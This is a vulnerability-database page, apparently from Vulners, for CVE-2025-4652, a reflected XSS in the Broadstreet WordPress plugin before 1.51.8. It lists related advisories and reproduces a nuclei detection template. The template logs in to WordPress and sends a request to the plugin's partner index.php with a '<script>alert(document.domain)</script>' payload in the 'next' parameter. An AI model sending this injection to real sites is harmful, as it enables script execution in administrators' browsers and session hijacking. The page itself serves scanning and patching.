Lucene search
K

Broadstreet WordPress plugin - Reflected XSS

🗓️ 30 Jun 2026 04:56:11Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 15 Views

Broadstreet WordPress plugin older than 1.51.8 has a reflected cross site scripting flaw requiring user interaction.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2025-4652
9 Jun 202507:23
circl
CNNVD
WordPress plugin Broadstreet 安全漏洞
9 Jun 202500:00
cnnvd
CNVD
WordPress Broadstreet plugin cross-site scripting vulnerability
17 Jun 202500:00
cnvd
CVE
CVE-2025-4652
9 Jun 202506:00
cve
Cvelist
CVE-2025-4652 Broadstreet < 1.51.8 - Reflected XSS
9 Jun 202506:00
cvelist
EUVD
EUVD-2025-17433
3 Oct 202520:07
euvd
NVD
CVE-2025-4652
9 Jun 202506:15
nvd
OSV
CVE-2025-4652
9 Jun 202506:15
osv
Patchstack
WordPress Broadstreet plugin < 1.51.8 - Reflected XSS vulnerability
9 Jun 202519:13
patchstack
Positive Technologies
PT-2025-24405
9 Jun 202500:00
ptsecurity
Rows per page
id: CVE-2025-4652

info:
  name: Broadstreet WordPress plugin - Reflected XSS
  author: Sourabh-Sahu
  severity: medium
  description: |
    Broadstreet WordPress plugin < 1.51.8 contains a reflected XSS caused by unsanitised and unescaped parameter output, letting attackers execute scripts against high privilege users such as admin, exploit requires victim interaction.
  impact: |
    Attackers can execute scripts in admin users' browsers, potentially leading to session hijacking or privilege abuse.
  remediation: |
    Update to version 1.51.8 or later.
  reference:
    - https://wpscan.com/vulnerability/2a18ab96-ba95-4599-824f-df12e4851e6d/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2025-4652
    cwe-id: CWE-79
    epss-score: 0.00468
    epss-percentile: 0.37072
    cpe: cpe:2.3:a:broadstreetads:broadstreet:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: broadstreetads
    product: broadstreet
  tags: cve,cve2025,broadstreetads,broadstreet,authenticated,wordpress,wp,wp-plugin,xss

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-content/plugins/broadstreet/Broadstreet/Vendor/broadstreet-partner/index.php?action=register&id=123&next="/><script>alert(document.domain)</script> HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "><script>alert(document.domain)</script>","broadstreet")
        condition: and
# digest: 4a0a0047304502204b39854c243b60ff3f1492dad585588f0cc4f61b7e9066c7e0dca50f07d96505022100f1abeb6e9430b07ede0bd8b2128699f48a7f23334db5911006d3010c0eacaae4:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Feb 2026 17:16Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.16.1
EPSS0.00468
SSVC
15